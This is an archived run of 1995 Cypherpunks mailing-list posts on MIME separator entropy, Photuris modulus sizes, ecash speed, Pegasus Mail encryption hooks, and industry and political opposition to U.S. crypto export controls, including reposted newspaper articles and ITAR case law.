> I think you are fine if the odds of corrupting the message are less than 
> the odds of getting hit by a a falling meteor while running the program. 
> In general there is little point in making any one part of the system 
> many orders of magnitude more reliable than any other part.

I agree entirely. That's why my PGP key at school is 382 bits. It's a
lot easier to compromise my machine than factor a 382 bit number.

So let me rephrase the question: what's the minimum number of entropy
bits that can be used and still give you that warm and fuzzy feeling
that you don't have to worry about the possibility that the message
might be corrupted?

The winning answer gets a free mention in the PGP/MIME Implementation
notes Web page: http://www.c2.org/~raph/impl.html

Raph





From tcmay at got.net  Wed Nov  8 18:47:32 1995
From: tcmay at got.net (Timothy C. May)
Date: Thu, 9 Nov 1995 10:47:32 +0800
Subject: This is an Architext Document: Read Carefully!
Message-ID: <acc69c7a11021004ca00@[205.199.118.202]>


At 8:54 PM 11/8/95, Kevin S. Van Horn wrote:

>A small point of information.  I work for Architext, the company that provides
>the excite service.  We only keep the last two weeks of USENET news around,
>and don't keep any archives going further back than that.  USENET is just too
>damn huge for us to go to the trouble of keeping comprehensive archives around
>without good evidence of demand for it among our target audience.

Small world. "Architext" is also the hypertext program I use to cross-index
many articles. I'm surprised the new company, also called "Architext,"
picked a name which will increase confusion.

("Architext," BrainPower, Inc., Agoura Hills, CA.)

No Cypherpunks relevance, except to show how name collisions can occur.

--Tim May

Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay at got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."







From jya at pipeline.com  Wed Nov  8 19:14:09 1995
From: jya at pipeline.com (John Young)
Date: Thu, 9 Nov 1995 11:14:09 +0800
Subject: Industry Group Rebuffs U.S. on Encryption
Message-ID: <199511090232.VAA00163@pipe1.nyc.pipeline.com>


   The New York Times, November 8, 1995. 


   Industry Group Rebuffs U.S. On Encryption

   By John Markoff


   The campaign by the Clinton Administration to create a
   standard for data encryption acceptable to industry, civil
   liberties and law enforcement groups broke down yesterday
   when a group including some of the nation's most powerful
   technology companies rejected a compromise proposal.

   The aim is to set a policy that meets the needs of
   electronic commerce as well as the concerns of the National
   Security Agency and other Federal offices that are opposed
   to the proliferation of data-coding software, feeling it
   will make it impossible for them to gather intelligence
   overseas.

   The Administration offered a compromise plan and had been
   seeking comment from the public. But the industry coalition
   said yesterday that it found the Government unwilling to
   compromise. Thus, the group of 37 companies said, it would
   formulate its own policy proposal to present to the White
   House and to Congress in the next six months.

   High-technology industries want a data-coding standard
   secure enough that both businesses and overseas customers
   could use it for sensitive financial and business
   correspondence. They seek a longer and more powerful
   encryption key than the Government is willing to grant, and
   object to Government demands that law enforcement agencies
   have "back-door" access to such transmissions that would
   allow them to intercept coded messages.

   The letter is signed by several of the country's leading
   computer, software and on-line companies, among them
   America Online, Apple Computer, AT&T, Eastman Kodak
   I.B.M.'s Lotus Development division, MCI Communications,
   Microsoft, Novell, Oracle Sybase and Tandem Computers.

   On Aug. 17, the Administration proposed a liberalization of
   export-control procedures for "key escrow" software
   products, or those providing law-enforcement access.

   "The current policy directive also does not address the
   need for immediate liberalization of current export
   restrictions," the letter said "Such liberalization is
   vital to enable U.S. companies to export state-of-the-art
   software products during the potentially lengthy process of
   developing and adopting a comprehensive national
   cryptography policy."

   [End]

----------

   The Washington Post, November 8, 1995


   Encryption Control Plan Sparks Industry Protest

      High-Tech Groups Say Proposals Unworkable

   By Elizabeth Corcoran


   High-technology companies and advocacy groups are writing
   to Vice President Gore and House Speaker Newt Gingrich to
   protest what they contend are unworkable federal proposals
   for controllng the export of data scrambling technology.

   The letters deepen an industry-government rift that began
   only days after federal officials unveiled an outline of
   what they hoped would be a palatable plan at an industry
   meeting in August.

   Two separate coalitions are criticizing the
   administration's draft proposal, which the government
   circulated on the Internet on Monday.

   Current export regulations prohibit companies froan sending
   overseas any encryption, or data-scrambling technology,
   that exceeds a certain degree of sophistication. The
   government argues that it needs to be able to peek at
   messages and files with proper court authorization -- to do
   its job of protecting U.S. citizens from terrorist groups
   and other malevolent organizations.

   In July, some French students demonstrated they could
   readily break the type of encryption technology that the
   U.S. government lets companies export. In August, the
   administration said it would let companies include more
   complex types of encryption, provided they pledged to
   entrust to an authorized agent a "spare key," or the means
   for unscrambling the information.

   Unlike early proposals in which the government said it
   would hold such keys, the administration is suggesting that
   companies and individuals would be able to select private
   keyholders, much the way people pick their banks.

   But after a brief honeymoon, industry and civil liberties
   groups began to find flaws with the details in the new
   proposals. This week's letters indicate that whatever
   fragile compromise the government had hoped it had found
   has grown even weaker.

   One coalition, pulled together by the Washington advocacy
   group Center for Democracy and Technology, includes about
   three dozen high-tech companies and associations. The group
   has promised to draft an alternative plan within six
   months.

   "There is a very serious message here: that national
   security can't be controlling the Internet," said Jerry
   Berman, executive director of the center. "There are other
   issues, global competitiveness and privacy, that need to be
   placed in the balance -- and the administration's policy
   doesn't do that."

   A second coalition of about 10 free-market and libertarian
   groups, led by another policy group, Americans for Tax
   Reform, plans to send their letter to Gingrich in the next
   day or two. The group contends the administration's
   encryption proposals are an encroachment on citizens' civil
   rights.

   The administration's proposals would not restrict tbe
   encryption technologies that people use within U.S.
   boundaries. But it would require that if they
   electronically send an encrypted message to parties outside
   the United States, a spare key must be stored with an
   authorized agency.

   "Even though we recognize [the administration] has worked
   hard on its proposals, it's not the right direction," said
   Rebecca Gould, director of policy at the Business Software
   Alliance, a trade association of software firms.

   "We've been in this [debate] since July 1994," she added,
   a long time for companies that churn out a new version of
   most products every 18 months. "That means lost sales for
   us and a loss of U.S. industry sales abroad."

   [End]

----------

Both slipped by gummed eyes, thx gnu.









From karn at qualcomm.com  Wed Nov  8 20:13:09 1995
From: karn at qualcomm.com (Phil Karn)
Date: Thu, 9 Nov 1995 12:13:09 +0800
Subject: Photuris Primality verification needed
In-Reply-To: <199511081833.TAA10801@soikko.cs.hut.fi>
Message-ID: <199511090347.TAA04403@servo.qualcomm.com>


>Including the provision for the 512 bit prime is *HARMFUL* and
>*DANGEROUS*.  Export control is not really an issue here, because if
>companies in the United States cannot provide secure networking,
>there are other companies in the world that can.

You've convinced me. I remove my proposal to include a recommended 512-bit
modulus. The smallest standard modulus will remain 1024-bits.

Phil





From adam at lighthouse.homeport.org  Wed Nov  8 20:32:28 1995
From: adam at lighthouse.homeport.org (Adam Shostack)
Date: Thu, 9 Nov 1995 12:32:28 +0800
Subject: Photuris Primality verification needed
In-Reply-To: <199511090337.TAA04357@servo.qualcomm.com>
Message-ID: <199511090418.XAA07907@homeport.org>


You might want to offer a number of strong moduli in the 1024-1500 bit
range.  Having multiple strong moduli in the same size (speed) range
reduces the value of going after a particular one.  We all know how
security software tends to stay deployed longer than it really should.

Adam

Phil Karn wrote:

| Thanks. That's pretty much what we are doing -- requiring a particular
| 1024-bit modulus but recommending several others as options. There's a
| 2048 bit optional modulus and may even be a 4096-bit option if I can
| find one in reasonable time. There was going to be a 512-bit optional
| modulus but the group has reacted so strongly to it that I'm willing to
| withdraw it.

-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume






From karn at qualcomm.com  Wed Nov  8 21:10:46 1995
From: karn at qualcomm.com (Phil Karn)
Date: Thu, 9 Nov 1995 13:10:46 +0800
Subject: Photuris Primality verification needed
In-Reply-To: <199511090418.XAA07907@homeport.org>
Message-ID: <199511090454.UAA04547@servo.qualcomm.com>


>You might want to offer a number of strong moduli in the 1024-1500 bit
>range.  Having multiple strong moduli in the same size (speed) range

We already have a secondary 1024-bit modulus in the spec. The question is
whether the problem is better solved by allowing parties to use private
moduli rather than by filling up the spec with additional moduli. Remember
that the original reason for specifying a particular modulus as "required"
is to guarantee some minimum degree of interoperability, not to meet every
possible threat.

Phil





From ohuf at relay.sedat.de  Wed Nov  8 21:11:51 1995
From: ohuf at relay.sedat.de (Oliver Huf)
Date: Thu, 9 Nov 1995 13:11:51 +0800
Subject: Exporting software doesn't mean exporting
In-Reply-To: <m0tCngd-0004JWC@pdj2-ra.F-REMOTE.CWRU.Edu>
Message-ID: <Pine.NXT.3.91.951107144209.255A-100000@oe1>




On Tue, 7 Nov 1995, Peter D. Junger wrote:

> >From Section 120.17 of the ITAR which provides:
> 
>  _Export_ means:
>  . . . .
>  (4) Disclosing (including oral or visual disclosure) or transfering
>  technical data to a foreign person, whether in the United States or
>  abroad . . . .

The ITAR is U.S.-Law. This only applies (by definition) to US-citizens
or persons in the U.S.!

I think it's a common mistake of many Americans that they believe
creating law means creating law for the whole world!


> Go read the section that I quoted again.  Where is there an exception
> for foreign persons who happen to be abroad?  

It's inherent. You simply can't apply US-law to non-US-citizens outside
the U.S.!  


oli.





From jcobb at ahcbsd1.ovnet.com  Wed Nov  8 22:03:34 1995
From: jcobb at ahcbsd1.ovnet.com (James M. Cobb)
Date: Thu, 9 Nov 1995 14:03:34 +0800
Subject: Virus-Blocker
Message-ID: <Pine.BSD.3.91.951109004245.1600C-100000@ahcbsd1.ovnet.com>


 
 
Friend, 
 
 
This item from 11 07 95 Edupage may be of interest to you: 
 
                      VIRUS-BLOCKER 
 
McAfee Associates has a new product called WebScan that 
identifies virus-tainted programs before they're downloaded 
and warns the user not to continue.  Security experts say 
WebScan is the first product that prevents viruses from in- 
fecting a computer to begin with, rather than attacking the 
problem after it's already occurred.  (Wall Street Journal 
6 Nov 95 B6) 
 
 
Cordially, 
 
Jim 
 
 
                         NOTE 
 
 
To subscribe to Edupage, send a message to: 
 
                 listproc@ educom.unc.edu 
 
In the body of the message type:
 
               subscribe edupage <your name> 
 
 






From jamesd at echeque.com  Wed Nov  8 22:39:05 1995
From: jamesd at echeque.com (James A. Donald)
Date: Thu, 9 Nov 1995 14:39:05 +0800
Subject: PGP Comment feature weakens remailer security
Message-ID: <199511090618.WAA21037@blob.best.net>


At 05:47 PM 11/8/95 -0800, Raph Levien wrote:
> So let me rephrase the question: what's the minimum number of entropy
> bits that can be used and still give you that warm and fuzzy feeling
> that you don't have to worry about the possibility that the message
> might be corrupted?

I guess that if comet hits the earth and exterminates the human race
you would not be unduly worried by a corrupted message, so let us make
the odds equal to human civilization being destroyed on the same day.

We get roughly one massive extinction every hundred million years, or 
so and a smaller blast that would demolish our technology every ten 
million years or

So the probability of an error was equal to the human race and most
major species being destroyed the same day, you would not be unduly 
worried.

Probability of human civilization and all large animals being wiped out
by comet impact tonight is 2.7E-11, so thirty five bits should be 
sufficient.

But, if you want to feel really comfortable, make it forty bits.

The probability of hitting a forty bit combination by chance is
equal to the probability that all large animals on earth will
be wiped out by comet impact in the next three quarters of an hour.

But you might have a million lines, and send a million messages,
each of a million lines.

So let us make the probability that one of those fails equal to
the chance that all large animals on earth get wiped out in the next
half hour.

Well in that case make it eighty bits.

 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd at echeque.com






From jsw at netscape.com  Wed Nov  8 22:54:27 1995
From: jsw at netscape.com (Jeff Weinstein)
Date: Thu, 9 Nov 1995 14:54:27 +0800
Subject: DejaNews all over again
In-Reply-To: <199511082306.PAA24448@jobe.shell.portal.com>
Message-ID: <30A19E4E.348A@netscape.com>


anonymous-remailer at shell.portal.com wrote:
> Afterall, Netscape (and AT&T) have had, over THREE WEEKS to work on this
> problem or to make some form of public comment, and have done nothing, but
> put some of their programmers -- unofficially ... speaking for myself ...
> not speaking for the Company -- programmers on this list

  I was posting here before your supposed "flaw" was posted.  I have never
been told that I should or should not participate on this list by anyone
at netscape.

> Meanwhile people are having their PGP keyrings collected, their passwords
> monitorred, and all of the information -- even information which they have
> NOT posted to Usenet, information that is simply on their personal hard
> drives, or on a private corporate network that is behind a firewall --
> collected by anyone who actualy understands *how* to use Netscape
> Navigator's standard features to do it.

  Please show us some proof.  All you have done is post unfounded allegations
backed up by flawed logic and a misunderstanding of the technology.  Send me
a URL, and I will point my navigator at it.  If you can collect my PGP key ring
you can gloat here or anywhere else.

	--Jeff

-- 
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw at netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.





From viking at pacifier.com  Wed Nov  8 23:26:39 1995
From: viking at pacifier.com (Robert East)
Date: Thu, 9 Nov 1995 15:26:39 +0800
Subject: Register
Message-ID: <m0tDQkJ-0008ySC@pacifier.com>


Register

I'd like to sign up for email

Bob






From scottst at ionet.net  Thu Nov  9 00:22:50 1995
From: scottst at ionet.net (Scott Staedeli)
Date: Thu, 9 Nov 1995 16:22:50 +0800
Subject: Pegasus Mail 2.20
Message-ID: <199511090804.CAA20494@ion1.ionet.net>


   The new beta release of Pegasus Mail (one of the better e-mail
apps available) has a new feature:


     --------------------------------------------------------------
    Runtime-loadable encryptor/decryptor modules for Pegasus Mail.

                         Pegasus Mail System, 
        Copyright (c) 1990-95, David Harris, All Rights Reserved
     --------------------------------------------------------------

The hot topic on everyone's lips is "privacy". And, as usual, the
computer industry is in the process of confusing and disrupting the issue
beyond recognition... We have factions all over the place each arguing
passionately for its own most beloved encryption scheme, and some of the
rhetoric is getting pretty heated.

Add to the proliferation of interests the USA's ridiculous export laws on
encryptors and the sum is trouble. As far as I can tell, encryption is
going through what seems to be an industry-standard cycle of chaos:
everyone suddenly realises there's a lack/opportunity/need and rushes to
promote the idea they like best; a small war develops during which the
users and peripheral developers are left bemused and bewildered amongst
the welter of extravagant claims and counter-claims, then eventually
(usually after two or three years of total pandemonium) the group with
the most clout (although not necessarily the best product) will win out
and become "the standard".

I've been through this rat race several times and have no desire whatever 
to go through it again; on the other hand, my USERS have very legitimate 
concerns about privacy. So what do I do? Easy - I pass the buck.

WinPMail v2.2 and later supports third-party, runtime loadable modules to
handle encryption and decryption of mail. A special mechanism has been
defined that allows Pegasus Mail to detect that a third party encryptor
has been used and to determine whether the matching decryptor is
available on the system. The built-in encryptor will remain available for
those sites who only need moderate levels of message security.  WinPMail
will define an open interface for third-party encryptors and it is then
up to other people to write the code. What I envisage actually happening
is people writing "shell interfaces" for WinPMail - i.e., modules that
take the calls I make and translate them into calls to other programs,
such as PGP or whatever, returning the result.

   Let the games begin.


--scottst at ionet.net------http://www.ionet.net/~scottst--
   >~<^xXx       | "The Internet is simply a means of 
        xX   #   | communication. Efforts to stop infor-
      (XXX) #    | mation by enjoining it are doomed to
    (XXXXXXX)    | failure in a free society."
DON'T TREAD ON ME|        -- Prof. Frank Tuerkheimer
========================================================
=========NSA trip phrase of the week: DEUTERIUM=========





From stewarts at ix.netcom.com  Thu Nov  9 01:31:52 1995
From: stewarts at ix.netcom.com (Bill Stewart)
Date: Thu, 9 Nov 1995 17:31:52 +0800
Subject: ecash speed
Message-ID: <199511090914.BAA08391@ix.ix.netcom.com>


>"Perry E. Metzger" <perry at piermont.com> writes:
>>I suspect that as CPU speed exponentiates this will become less and
>>less of a problem. It doesn't especially worry me.

CPU speed in desktop or notebook computers isn't much problem;
CPU speed in smartcards is still an issue, and it may be
one or two more rounds of exponentiation before we'll see cards
that are both fast enough and really secure.

At 09:08 PM 11/8/95 -0800, Hal <hfinney at shell.portal.com> wrote:
>Consider, though, what happens in the current ecash system if it were
>used to charge a penny per page.  You would click on a link in your web
>browser to go to the new page.  It would set the GET request to the
>remote server as usual.

For penny-a-page on-line services, unless ecash transaction costs are
_radically_
cheap, it probably makes more sense for the service to sell its own tokens,
bought with (anonymous or non-anonymous) ecash, which you then trade for pages.
No calculation required, just an on-line lookup for double-spending
and you don't get your page if you double-spend.  An alternative to them
picking the token numbers is for you to give them the numbers and them
to keep them in their database, but that's probably unlikely to be done
and doesn't really buy you much privacy.

If that's not anonymous enough for you (because your IP address could be
traced when you buy the tokens, and coordinated with them later),
use a packet laundry, or connect from your dialup access provider, 
which will tell the newspaper you're port43.server29.netcom.com or
something equally uninformative; or dial in from the public library or cafe.
#--
#				Thanks;  Bill
# Bill Stewart, Freelance Information Architect, stewarts at ix.netcom.com
# Phone +1-510-247-0663 Pager/Voicemail 1-408-787-1281







From stewarts at ix.netcom.com  Thu Nov  9 01:37:44 1995
From: stewarts at ix.netcom.com (Bill Stewart)
Date: Thu, 9 Nov 1995 17:37:44 +0800
Subject: "Industry Group Rebuffs U.S. on Encryption" (NYT 8Nov95, C3)
Message-ID: <199511090914.BAA08379@ix.ix.netcom.com>


At 04:50 PM 11/8/95 -0800, you wrote:
>A group of 37 companies and trade and privacy associations sent a
>letter to Al Gore yesterday, complaining about Clipper-II and crypto
>export controls, and promising to send their own policy proposals
>to Congress and the Administration within six months.

We talked about this at dinner - what kind of proposals can industry offer, 
other than "128 bits and honest escrow" or "64 bits and no escrow"?
"128 bits now, with no escrow if you want any campaign contributions this fall"
or simply "get stuffed, we're all buying our crypto from Europe and including
it in all our products" ?

According to one of the newspaper articles, the gang of 37 is a Jerry Berman/CDT
coordination, so I don't expect one of the more radical answers from them,
but maybe they'll do the right thing.  The fact that Netscape is including
secure email in their Navigator next release can be a big lever pushing the
Feds toward giving up, and perhaps deserves some publicity once the 
release version is out the door.
#--
#				Thanks;  Bill
# Bill Stewart, Freelance Information Architect, stewarts at ix.netcom.com
# Phone +1-510-247-0663 Pager/Voicemail 1-408-787-1281







From tcmay at got.net  Thu Nov  9 18:21:36 1995
From: tcmay at got.net (Timothy C. May)
Date: Thu, 9 Nov 95 18:21:36 PST
Subject: Market Value of Web Pages
Message-ID: <acc7f59c06021004e10b@[205.199.118.202]>


At 1:43 AM 11/10/95, Mark wrote:

(Description of a Web page earning $3,600,000 a year elided.)


>If you toss arguements like this at some of the sites that would be viable for
>the hit numbers and then explain the only way that will occur is if the crypto
>laws are repealed, you will create a lot more lobbiers annoying their reps
>for the cause. ecash without good crypto is like the Federal Reserve
>deliverying cash with open pickup trucks. Or doing credit card purchases on
>postcards.

And if you make arguments that this is easy to do, and add that crypto laws
are stopping this from happening, you risk losing your credibility.

The current crypto export laws are a pain, but are not stopping these
"million hits a day" transactions. Recall that the 40 bits allowed in
Netscape for export took some non-trivial number of machine-hours to crack
(I'm talking about the brute force crack by Damien G. and others, not the
more recent exploitation of the RNG weakness). While this brute force crack
showed the limitations of the 40-bit key for certain transactions, it is
not a viable attack on a single transaction whose value is pennies.

As to the "$3.6 million a year," nice work if you can get it.

I fully expect some folks to make a lot of money. But beware the siren call
of make.money.fast...most people won't.

In any case, let's not claim that the lack of strong exportable crypto is
the reason these "Web millionaires" are not all around us. (Actually, a lot
of them are, but because their companies are doing so well, not because
their home pages are getting a million hits a day.)

--Tim May

Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay at got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."







From jya at pipeline.com  Thu Nov  9 04:54:35 1995
From: jya at pipeline.com (John Young)
Date: Thu, 9 Nov 1995 20:54:35 +0800
Subject: Coding-Export Limits Opposed
Message-ID: <199511091239.HAA07833@pipe4.nyc.pipeline.com>


   The New York Times, November 9, 1995, p. D4. 


   Coding-Export Limits Opposed

   The political right has joined the opposition to the
   Clinton Administration's proposed restriction on the export
   of data-coding systems.

   A group of 12 conservative organizations -- including the
   National Rifle Association, Americans for Tax Reform and
   the Competitive Enterprise Institute -- sent a letter
   yesterday to House Speaker Newt Gingrich protesting
   Administration efforts to limit the export of cryptographic
   software and hardware.

   Calling the proposal anti-consumer, anti-business and
   anti-progress, the groups urged Mr. Gingrich to support the
   relaxation of export controls. "The Administration's
   approach is the wrong policy for today's marketplace," the
   letter stated.

   The letter to Mr. Gingrich followed one sent on Tuesday to
   Vice President Al Gore from 37 corporate and publicpolicy
   groups, including the Microsoft Corporation and America
   Online Inc. The letter to Mr. Gore opposed Administration
   efforts to strike a compromise that would limit the
   strength of encryption software exports and require an
   escrowed code-key system, which would contain trapdoor
   access for American law enforcement agencies.

   [End]













From dl at hplyot.obspm.fr  Thu Nov  9 06:15:26 1995
From: dl at hplyot.obspm.fr (Laurent Demailly)
Date: Thu, 9 Nov 1995 22:15:26 +0800
Subject: Mime/multipart (was Re: PGP Comment feature weakens remailer security)
In-Reply-To: <199511080454.UAA05765@jobe.shell.portal.com>
Message-ID: <9511091356.AA09725@hplyot.obspm.fr>


Raph Levien writes:
 >    On an unrelated topic... cypherpunks like to count bits, right?
 > What is the correct number of pseudorandom bits to use in a MIME
 > multipart separator? If the data has a line which matches the
 > separator, the message is corrupted. Of course, if you can take
 > multiple passes through the data, you can simply verify that it does
   ***************
No need !
 > not contain a line which matches the separator. But if you're
 > restricted to a single pass, then the only way to do it is to use a
 > randomly generated separator.
I've waited a bit, but as nobody seem to have pointed out, you can
definitly find a unique stream in a *single* pass (but maybe what you
really want is no pass at all ?)
{you add a new random byte each time you find your sequence in the
stream, and goes forward (as the previous separator was not in the
"past" of the stream, you don't need to go back)}

What am I missing ? (anyway, see below)
(I hope my answer is not as clueless as the "A-dice anonymous" one)

 >    I figure that 128 bits should _definitely_ be enough (that's what
 > is in the new premail code now). Even 64 bits should ensure that it is
 > unlikely that anyone will ever experience message corruption over the
 > expected lifetime of premail. However, it makes me nervous. What do
 > people think?

Isn't PGP encoded stream containing only base64 chars ? Why not use
"====PGP part #===="  (as you can't have more than 2 = in a base 64,
and only at the end anyway)
or "@PGP part #" or whatever starting with a non base64 char ?

so "@" = 8 bits is my anwser, do I win ;-) ?

dl
--
Laurent Demailly * http://hplyot.obspm.fr/~dl/ * Linux|PGP|Gnu|Tcl|...  Freedom
Prime#1: cent cinq mille cent cinq milliards cent cinq mille cent soixante sept

Greenpeace Uzi NORAD DES NSA [Hello to all my fans in domestic
 surveillance] Clinton





From perry at piermont.com  Thu Nov  9 06:34:33 1995
From: perry at piermont.com (Perry E. Metzger)
Date: Thu, 9 Nov 1995 22:34:33 +0800
Subject: PGP Comment feature weakens remailer security
In-Reply-To: <199511090147.RAA31271@kiwi.cs.berkeley.edu>
Message-ID: <199511091413.JAA15288@jekyll.piermont.com>



Raph Levien writes:
> > I think you are fine if the odds of corrupting the message are less than 
> > the odds of getting hit by a a falling meteor while running the program. 
> > In general there is little point in making any one part of the system 
> > many orders of magnitude more reliable than any other part.
> 
> I agree entirely. That's why my PGP key at school is 382 bits. It's a
> lot easier to compromise my machine than factor a 382 bit number.

On the other hand, it costs nothing by most people's standards to use
a 1024 bit key, so why not use one? I find that there is only a point
in using low security for anything in particular when there is a
perceivable cost to it -- if the cost is typing a different number
while doing key generation, I don't see why one should suffer the
tradeoff.

Perry





From jamesd at echeque.com  Thu Nov  9 06:39:50 1995
From: jamesd at echeque.com (James A. Donald)
Date: Thu, 9 Nov 1995 22:39:50 +0800
Subject: Cybercensor in Singapore
Message-ID: <199511091425.GAA00125@blob.best.net>


At 06:15 PM 11/8/95 +0100, Anonymous wrote:
> The Government has blunted an uncensored
> Internet forum on Singapore political life by assembling
> a group of users who make sure the Government's views are
> represented.

That is censorship?

I visited the Singapore forum a few months ago --

When I visited Cuba (physically) everyone was visibly afraid.

When I visited the Singapore electronically, they were not
afraid.

 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd at echeque.com






From perry at piermont.com  Thu Nov  9 06:49:39 1995
From: perry at piermont.com (Perry E. Metzger)
Date: Thu, 9 Nov 1995 22:49:39 +0800
Subject: Photuris Primality verification needed
In-Reply-To: <199511090337.TAA04357@servo.qualcomm.com>
Message-ID: <199511091430.JAA15324@jekyll.piermont.com>



Phil Karn writes:
> >I don't know.  Maybe the right thing to do is require conforming
> >implementations to support a large modulus but include recommended
> >smaller moduli.  Then Alice can always force Bob to use the large
> >modulus but, if both agree, they can use something smaller from the
> >standard or even their own home-grown modulus.
> 
> Thanks. That's pretty much what we are doing -- requiring a particular
> 1024-bit modulus but recommending several others as options.

I think Brian is also suggesting that it would be good if people could
negotiate new and previously unheard of modulii if they wanted to.

Perry





From perry at piermont.com  Thu Nov  9 06:56:30 1995
From: perry at piermont.com (Perry E. Metzger)
Date: Thu, 9 Nov 1995 22:56:30 +0800
Subject: ecash speed
In-Reply-To: <199511090508.VAA05884@jobe.shell.portal.com>
Message-ID: <199511091441.JAA15345@jekyll.piermont.com>



Hal writes:
> "Perry E. Metzger" <perry at piermont.com> writes:
> 
> >Hal writes:
> >> The point is that if the anonymity afforded by ecash is too costly in
> >> terms of time, then we may end up stuck with a non-anonymous system
> >> simply because that is the only one efficient enough to work.  It would
> >> be good to find out if that is a serious problem.
> 
> >I suspect that as CPU speed exponentiates this will become less and
> >less of a problem. It doesn't especially worry me.
> 
> Consider, though, what happens in the current ecash system if it were
> used to charge a penny per page.
[Describes lots of steps...]

I'm really not that convinced that this is a problem in either
direction. With users everywhere on the net connected via
multi-megabit per second links, high speed CPUs, etc, a few extra TCP
connections and RSA operations really might not be noticed in a half
dozen years.

> This all has to happen whenever you click on a link in your browser.
> Even with fast CPU's I think the extra step of connecting to the bank,
> having it check against all coins, and getting approval will be
> considerable for each link traversal.

Again, I'm not convinced either way. I believe we have to wait and see
how fast things really are in practice.

Perry





From andreas at artcom.de  Thu Nov  9 07:11:36 1995
From: andreas at artcom.de (Andreas Bogk)
Date: Thu, 9 Nov 1995 23:11:36 +0800
Subject: Photuris Primality verification needed
In-Reply-To: <199511090337.TAA04357@servo.qualcomm.com>
Message-ID: <m0tDYGN-0002e9C@horten>


-----BEGIN PGP SIGNED MESSAGE-----

>>>>> "Phil" == Phil Karn <karn at qualcomm.com> writes:

    Phil> as options. There's a 2048 bit optional modulus and may even
    Phil> be a 4096-bit option if I can find one in reasonable
    Phil> time. There was going to be a 512-bit optional modulus but

I'd like to see the 4096 bit modulus. Let me know if I can help you by
donating computation power. We have a SGI Onyx with 4 processors and
several smaller SGI computers.

Andreas


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Processed by Mailcrypt 3.4, an Emacs/PGP interface

iQCVAgUBMKIUdEyjTSyISdw9AQGEawP9FUG9X5t8n/w0BRcWVTPv6LeERgY78WHc
mBNG4ScvbRZK6o4ZoQuEr10v4eDqKQtHD3lkdV5HJO2+oBrNkLOLKyVR8sr0Yh+3
wKyOeF8BUKqwILteJGT8UQnznFnHha0m9HxlHOIUrx6SOGIMc6t6N4DFCRzOis0h
dc0pgYN2S/Y=
=QKwE
-----END PGP SIGNATURE-----





From rmartin at aw.sgi.com  Thu Nov  9 07:15:04 1995
From: rmartin at aw.sgi.com (Richard Martin)
Date: Thu, 9 Nov 1995 23:15:04 +0800
Subject: Pegasus Mail
In-Reply-To: <9511091252.AA04699@sulphur.osf.org>
Message-ID: <9511090956.ZM2558@glacius.alias.com>


On Nov 9,  7:52am, Rich Salz wrote:
> Subject: Re: Pegasus Mail
> I sure hope some tells David Harris that his program is now export
> controlled.  From my reading of his message, it seemed like he thinks he
> "beat the system" because he didn't include actual crypto code.
Hm. David Harris lives in New Zealand.

This makes him a very good man to be writing mail software. Also makes
Pegasus Mail our local software of choice. (We use it at school.) That
it now has hooks for external encryption packages is very good news.

richard
--
Richard Martin
Alias|Wavefront - Toronto Office [Co-op Software Developer, Games Team]
rmartin at aw.sgi.com/g4frodo at cdf.toronto.edu      http://www.io.org/~samwise
Trinity College UofT ChemPhysCompSci 9T7+PEY=9T8 Shad Valley Waterloo 1992





From adam at lighthouse.homeport.org  Thu Nov  9 07:29:02 1995
From: adam at lighthouse.homeport.org (Adam Shostack)
Date: Thu, 9 Nov 1995 23:29:02 +0800
Subject: Pegasus Mail
In-Reply-To: <9511091252.AA04699@sulphur.osf.org>
Message-ID: <199511091518.KAA08137@homeport.org>


I sure hope no one does.  The ITARs seem to contain a 'scienter'
requirement; that you must know (or have a reasonable idea) that you
are breaking them for it to be criminal.  If he thinks he's ok, he is
until someone tells him otherwise.

	I am not a lawyer.  That is not legal advice.  Go consult a
good ITAR attorney if you want to try that at home. :)

Rich Salz wrote:

| I sure hope some tells David Harris that his program is now export
| controlled.  From my reading of his message, it seemed like he thinks he
| "beat the system" because he didn't include actual crypto code.



-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume






From hfinney at shell.portal.com  Thu Nov  9 07:44:42 1995
From: hfinney at shell.portal.com (Hal)
Date: Thu, 9 Nov 1995 23:44:42 +0800
Subject: Pegasus Mail
In-Reply-To: <9511091252.AA04699@sulphur.osf.org>
Message-ID: <199511091528.HAA05703@jobe.shell.portal.com>


Rich Salz <rsalz at osf.org> writes:

>I sure hope some tells David Harris that his program is now export
>controlled.  From my reading of his message, it seemed like he thinks he
>"beat the system" because he didn't include actual crypto code.

Even if he were in the US, I would hope that no one told him that.  One
of the elements of the offense of violating the arms export control act
is that the violation be willful.  The exporter has to violate a known
legal duty not to export the item.  One of the reasons for this is simply
that the ITAR list is long and technical and average individuals cannot be
expected to know all its details.  This is mentioned in the Lizarraga
case, at approximately 541 F2d 828:

"Two features of 22 USC 1934 strongly indicate that Congress used the
term 'willful' to require a showing of specific intent.  First, the
statute prohibits exportation of items listed by administrative
regulation, not by the statute itself.  Second, upon referring to the
pertinent regulation, 22 CFR part 121, we find that the regulation
contains an exhaustive list of items including amphibious vehicles,
pressure-breathing suits, aerial cameras, 'privacy devices,' and
concealment equipment (including paints).  Unlike those substances which
are known generally to be controlled by government regulation, such as
heroin or like drugs, these items might be exported or imported
innocently.  Under such circumstances, it appears likely that Congress
would have wanted to require a voluntary, intentional violation of a
known legal duty not to export such items before predicating criminal
